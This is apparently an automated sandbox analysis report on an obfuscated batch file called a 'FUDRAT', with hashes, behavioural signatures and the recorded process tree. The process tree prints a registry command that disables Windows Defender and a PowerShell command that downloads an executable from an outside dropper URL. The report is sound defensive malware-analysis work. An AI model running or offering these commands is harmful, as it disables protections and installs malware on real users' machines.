Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
24-12-2024 17:26
Static task
static1
Behavioral task
behavioral1
Sample
FUDRAT___Obfuscated.bat
Resource
win7-20240729-en
windows7-x64
6 signatures
150 seconds
General
-
Target
FUDRAT___Obfuscated.bat
-
Size
463B
-
MD5
a9fdda2577ff67660be21d0d4cd98179
-
SHA1
15432871fed4cbb19ec26eaabcc6b193beebbbfb
-
SHA256
8f18705cf5653667888ea5f2440e984d22c5207e7e5e2fccb68e7ad71f58bb83
-
SHA512
0f43e8b47bdd9d1a2ce65db49868f7698b83bcb5f8d249a29078793e5ca48d75bf8ce99dae00f772c28b766ac761040c0113d9034e7e7d35efb75b39eca5153d
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://whatsabool.online/kingvonpiracyvirus/load.exe
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2692 powershell.exe 6 2692 powershell.exe -
pid Process 2692 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2692 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2264 wrote to memory of 2376 2264 cmd.exe 31 PID 2264 wrote to memory of 2376 2264 cmd.exe 31 PID 2264 wrote to memory of 2376 2264 cmd.exe 31 PID 2264 wrote to memory of 2692 2264 cmd.exe 32 PID 2264 wrote to memory of 2692 2264 cmd.exe 32 PID 2264 wrote to memory of 2692 2264 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\FUDRAT___Obfuscated.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:2376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://whatsabool.online/kingvonpiracyvirus/load.exe', 'C:\Users\Admin\AppData\Local\Temp\load.exe')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-